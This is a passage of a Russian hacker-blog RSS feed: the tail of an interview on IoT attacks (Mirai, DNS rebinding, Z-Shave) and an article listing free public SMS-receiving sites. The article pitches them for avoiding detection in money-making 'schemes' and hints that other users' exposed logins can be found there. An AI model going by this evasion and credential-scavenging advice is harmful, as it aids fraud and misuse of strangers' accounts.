  <blockquote>— Из свежих примеров дырявости IoT — DNS rebinding — «сетевое устройство привязывают к вредоносному DNS-серверу и превращают его в точку входа в инфраструктуру жертвы». Ну и как результат — «интерактивная колонка Google Home позволяет злоумышленнику манипулировать ее настройками, сканировать Wi-Fi-сети, запускать установленные приложения и воспроизводить мультимедийный контент».</blockquote>
  <blockquote>Или недавняя новость о том, как злоумышленники пытаются проэксплуатировать критическую уязвимость в маршрутизаторах D-Link, чтобы те в свою очередь пополнили ряды ботнета Satori.</blockquote>
  <blockquote><strong>— А какие IoT-девайсы взламывают чаще всего?</strong></blockquote>
  <blockquote>— Чаще всего взламывают те IoT-девайсы, которые наиболее распространены. Ярким примером может служить ботнет Mirai, который «ломал» IP-камеры и DVR-регистраторы. В каком-то смысле, думаю, он уже вошел в учебники истории по ИБ. Кстати, с IP-камерами связана и другая <a href="https://www.csoonline.com/article/3282787/security/researchers-disclose-7-flaws-in-390-axis-ip-cameras-remote-attacker-could-take-control.html" target="_blank">серьезная уязвимость</a>. При определенном раскладе плохие парни могут получить полный контроль над IP-камерами фирмы Axis.</blockquote>
  <blockquote><strong>— Что еще взламывают а кроме камер?</strong></blockquote>
  <blockquote>— Чтобы немного разбавить тему взлома IP-камер и роутеров, стоит сказать пару слов об атаке <a href="https://www.pentestpartners.com/security-blog/z-shave-exploiting-z-wave-downgrade-attacks/" target="_blank">Z-Shave</a>. Хорошим парням удалось откатить протокол шифрования S2 до уязвимой версии S0 (в случае протокола S0 использовался сложнейший ключ шифрования в виде шестнадцати нулей) и далее эксплуатировать баги в протоколе S0. В результате чего «белые шляпы» сумели открыть смарт-замок Yale.</blockquote>
  <blockquote>Но это как раз пример нетривиальной атаки. В общем случае сначала будут взламываться те устройства, которые используют «стандартные» протоколы передачи данных — Ethernet, Wi-Fi, Bluetooth. Уже потом под удар могут попасть гаджеты, работающие на различных RF-протоколах — ZigBee, LoRa, Z-Wave и других.</blockquote>
  <blockquote><strong>— Есть какие-то иные принципы выбора целей, кроме типа устройства?</strong></blockquote>
  <blockquote>— Другим критерием того, какие устройства наиболее вероятно станут мишенью, является применение однотипных ОС. Думаю, ни для кого не секрет, что в embedded зачастую используются облегченные вариации Linux. Потом уже идут другие встроенные ОС: FreeRTOS, ChibiOS, embOS и масса других RTOS. Вот и получается, что ботнеты (Mirai, Satori, Persirai и подобные) сначала будут атаковать то, что подключается по Ethernet/Wi-Fi и работает под Linux, и только потом в их прицел, возможно, попадут менее популярные варианты.</blockquote>
  <p><strong>На сегодня всё, киберсталкеры. Во второй части данной статьи мы с вами разберём предметно некоторые свежие уязвимости в интернете вещей. Зачем нам это нужно? Да прост. Кому-то может и пригодиться. Особенно, если учесть, что живём мы с вами всё-таки в 21-ом веке.</strong></p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@redterror/r1xwZhjvm</guid><link>https://teletype.in/@redterror/r1xwZhjvm?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=redterror</link><comments>https://teletype.in/@redterror/r1xwZhjvm?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=redterror#comments</comments><dc:creator>redterror</dc:creator><title>Виртуальный номер для приема СМС.</title><pubDate>Mon, 26 Nov 2018 17:26:12 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/7b/7bb4651f-641f-477a-ac74-345cc5368bcf.png"></media:content><description><![CDATA[<img src="https://teletype.in/files/ac/ac6b2a60-5ff6-47b0-830d-a8f432a75b47.jpeg"></img>Нихау, бегущие в тенях! Привет, случайный подписчик. Мы потихоньку подводим вас к тому, чтобы вы начали самостоятельно зарабатывать бабло в сети и мутить различные схемы. А в этом деле главное что? Главное, не спалиться. Ибо безопасность, сука, решает. Эта статья вам в помощь.]]></description><content:encoded><![CDATA[
  <figure class="m_column">
    <img src="https://teletype.in/files/ac/ac6b2a60-5ff6-47b0-830d-a8f432a75b47.jpeg" width="1024" />
  </figure>
  <p><strong>Нихау, бегущие в тенях! Привет, случайный подписчик. Мы потихоньку подводим вас к тому, чтобы вы начали самостоятельно зарабатывать бабло в сети и мутить различные схемы. А в этом деле главное что? Главное, не спалиться. Ибо безопасность, сука, решает. Эта статья вам в помощь.</strong></p>
  <p><strong>Поехали:</strong></p>
  <p><strong>Для приема смс онлайн существуют специальные сайты, </strong>которые предоставляют специальный виртуальный номер, на который вы можете получить смс сообщение. Все представленные в этом обзоре сайты бесплатные и не требуют регистрации. Я расскажу о лучших, на мой взгляд, сервисах для получение смс онлайн и о том, как ими правильно пользоваться.</p>
  <p>Данная статья возможно будет обновляться, чтобы не терять свою актуальность. Поэтому, если вы знаете другие сервисы, предоставляющие виртуальный номер для приема смс, скиньте ссылку в комменты (в бот). Я имею ввиду что-то дельное и полезное для пользователей, а не реклама какого-то го###о-сайта!</p>
  <p>Кстати, существуют аналогичные сервисы для получения электронной почты. Такие сайты предоставляет временный почтовый ящик, которые в связке с хорошим анонимным прокси или vpn могут надежно скрыть информацию об отправителе, т.е. о вас. О таких сервисах мы ещё напишем в статье «Одноразовая почта». Не забывайте, что отправка электронной почты дает возможность получателю узнать о вас много важной информации, такой как: определение IP-адреса, местоположения и т.д., подробно об этом мы расскажем вам в статье «IP адрес по электронной почте»</p>
  <p><strong>Виртуальный номер для приема СМС</strong></p>
  <p><strong>В каких случаях может понадобится виртуальный номер для приема смс? </strong>Есть много разных ситуаций. Получение смс онлайн может использоваться в первую очередь для улучшения анонимности. Используя виртуальные номера пользователь может избежать слежки в сети интернет. Вот примеры использования сервисов приема смс сообщений.</p>
  <ul>
    <li>Для получения смс подтверждение онлайн.</li>
    <li>Смс онлайн через интернет можно использовать при регистрации в социальных сетях, одноклассники, вконатке и т.д.</li>
    <li>Также прием смс онлайн может понадобится при регистрация почтовых ящиков.</li>
  </ul>
  <p><strong>Виртуальный номер без регистрации</strong></p>
  <p><strong>Данная глава посвящена онлайн-сервисам, которые не требуют регистрации. </strong>Этими сайтами можно пользоваться, когда необходимо быстро и бесплатно получить смс онлайн. Посылать смс на такие виртуальные номера можно только в том случае, когда в нем не содержатся никакие чувствительные данные.</p>
  <p>Чувствительными данными не являются код активации или пароль с логином до тех пор, пока не указанна ссылка или название сайта с которого было отправлено смс. Эта информация может быть не только в видимой части письма, но и в технических заголовках (RFC заголовки) письма.</p>
  <p><strong>Вот пример того, как нельзя использовать виртуальный номер без регистрации.</strong> Пароль и логин какого-то бедолаги мы замылили, как-то не хочется участвовать в вашем взломе.</p>
  <figure class="m_custom">
    <img src="http://www.spy-soft.net/wp-content/uploads/onlajn-virtualnye-nomera-besplatno.jpg" width="592" />
  </figure>
  <p><strong>Многие не очень продвинутые пользователи не учитывают, то о чем я говорил выше и такими не обдуманными действиями теряют доступ к своими и чужим аккаунтам. </strong>Поэтому если покопаться на подобных сайтах можно найти много чего съедобного. Но не забывайте, что использование чужих данных для авторизации тоже в каком-то смысле взлом. А как вы знаете, за взлом в любой стране законом предусмотрен срок.</p>
  <p><strong>Sellaite</strong></p>
  <p>Начнем с сайта <a href="http://sellaite.com/smsreceiver/index.php#phone_list" target="_blank">Sellaite</a>. Данный сайт позволяет бесплатно получить смс онлайн, используя один из свободных на тот момент номеров.</p>
  <p>Сервис не требует регистрации. Для получения смс онлайн перейдите на страницу сайта и нажмите на доступный номер.</p>
  <p><strong>Имейте ввиду предоставляемый номер для смс может в любой момент сменится. Поэтому регистрируйте на него только то, что не потребует будущего подтверждения и привязки к номеру.</strong></p>
  <h3>Receive-SMS-Online</h3>
  <p>Следующий сайт называется <a href="http://receive-sms-online.com/" target="_blank">Receive-SMS-Online</a>. Среди возможных виртуальных номеров часто попадаются Русские и Украинские. Что может очень полезно для нашей аудитории.</p>
  <p>Для получения смс не требуется регистрация. Заходим выбираем номер и посылаем смс.</p>
  <p>Это еще один общий публичный виртуальный номер для приема sms, так что с ним те же правила что и с первым сервисом.</p>
  <h3>FreeOnlinePhone</h3>
  <p><a href="http://www.freeonlinephone.org/" target="_blank">FreeOnlinePhone</a> — сайт предоставляет онлайн номера для получения смс. Русских номеров не замечено, но не смотря на это сайт работает стабильно.</p>
  <p><strong>ReceiveSMSOnline</strong></p>
  <p><a href="https://www.receivesmsonline.net/" target="_blank">ReceiveSMSOnline</a> — еще один сервис который предлагает виртуальный номер бесплатно. На момент написания статьи сервис предоставлял только Британские и Американские виртуальные номера, хотя в описании говорится еще как минимум о двух странах: Канада и Швеция.</p>
  <p>Во время тестирования данного сервиса были задержки. С одного источника смс шла примерно 20 минут, с другого около 30.</p>
  <h3>Receive-SMS</h3>
  <p>Rec<a href="http://receive-sms.com/" target="_blank">eive-SMS</a> - еще один сайт предоставляющий виртуальный номер для приема СМС бесплатно и без регистрации.</p>
  <p>Кроме бесплатного виртуального номера, предлагает продажу номеров. Цена за один номер на один месяц 9$.</p>
  <p><strong>ReceiveFreeSMS</strong></p>
  <p>Следующий сервис — <a href="http://receivefreesms.com/" target="_blank">ReceiveFreeSMS</a>. Предлагает виртуальный номер бесплатно. И не номер, а целую кучу виртуальных номеров разных стран.</p>
  <p><strong>Это лучший сервис на мой взгляд. Буду молится за его здравие, надеюсь он еще долго проживет и порадует анонимов.</strong></p>
  <p>Имейте ввиду. Некоторые крупные сайты определяют виртуальный номер и отказываются посылать на него смс. Это происходит крайне редко, но бывает. Так что если не получается получить смс на определенный номер или вообще на какой-то сервис, то не стоит расстраиваться, пробуйте другой. Также стоит учитывать тот факт, что виртуальные номера не долговечны и имеют тенденцию часто меняться.</p>
  <p><strong>Вот вроде и все, киберсталкеры. На самом деле мы хотели дополнить этот список еще другими сайтами для приема смс онлайн через интернет, которые хоть и требуют регистрации, но имеют более богатый функционал. Но статья немного затянулась, и возможно продолжение будет в другой статье. Так что оставайтесь с нами, чтобы не пропустить.</strong></p>

]]></content:encoded></item></channel></rss>